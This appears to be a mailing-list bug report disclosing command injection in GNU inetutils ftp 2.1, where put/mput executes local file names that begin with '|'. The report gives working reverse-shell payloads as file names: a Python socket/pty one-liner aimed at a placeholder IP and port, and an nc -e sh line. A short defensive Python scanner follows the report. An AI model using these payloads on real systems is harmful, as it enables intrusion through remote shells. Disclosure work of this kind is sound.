After some further testing, I've found that I'm still able to get a shell
with the aforementioned payload even with other files in the same
directory. I've also found that I can get a shell with the following
file name:

```
|nc 127.0.0.1 1337 -e sh
```

As a result, I believe code execution is caused by having a `|` (pipe) at
the beginning of the file name.

Also, the version information is as follows.

```
$ ftp --version
ftp (GNU inetutils) 2.1
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xn...@gmail.com> wrote:

> I've found that with a certain file name, `ftp` executes code in the file
> name. The file is created with the following command
>
> ```
> touch "|python3 -c 'import
> os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for
> f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
> ```
>
> To get code to execute, simply have the file in the current directory
> (haven't tested with multiple files in the directory) and run `put *` to
> upload everything.
>
> This bug was found while I was doing a CTF (capture the flag) challenge
> and I haven't been able to connect to the same server since for further
> testing.
>
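As an added defender-side check, not part of the bug report or of inetutils: a small Python scan that flags the directory entries a `put *`/`mput` would hand to the ftp client's pipe handling (a leading `|`, as the report describes) so they can be refused before an upload. The `|`-prefix rule is the report's observation; the function names and the sample directory are mine.

```python
import os
import tempfile

# The report's finding: ftp's put/mput treats a local name that begins with
# '|' as a command to pipe from, not as a file to read. Only the first
# character matters, so a trailing ".csv" (the original payload ends with
# ';echo .csv') does not make such a name safe.
PIPE_PREFIX = "|"


def suspicious_upload_names(names):
    """Return the entries of `names` that put/mput would treat as a command."""
    return [n for n in names if n.startswith(PIPE_PREFIX)]


def scan_directory(path):
    """Classify every entry of `path` the way a `put *` in that directory would."""
    names = sorted(os.listdir(path))
    flagged = suspicious_upload_names(names)
    return {
        "files": [n for n in names if n not in flagged],
        "would_run_as_command": flagged,
    }


def build_sample_dir():
    """Constructed sample: a benign CSV next to the file name quoted above."""
    d = tempfile.mkdtemp(prefix="ftp-put-check-")
    for name in ("report.csv", "|nc 127.0.0.1 1337 -e sh"):
        open(os.path.join(d, name), "w").close()
    return d


if __name__ == "__main__":
    result = scan_directory(build_sample_dir())
    for name in result["would_run_as_command"]:
        print(f"refusing to upload {name!r}: ftp would run it as a command")
    print("safe to upload:", result["files"])
```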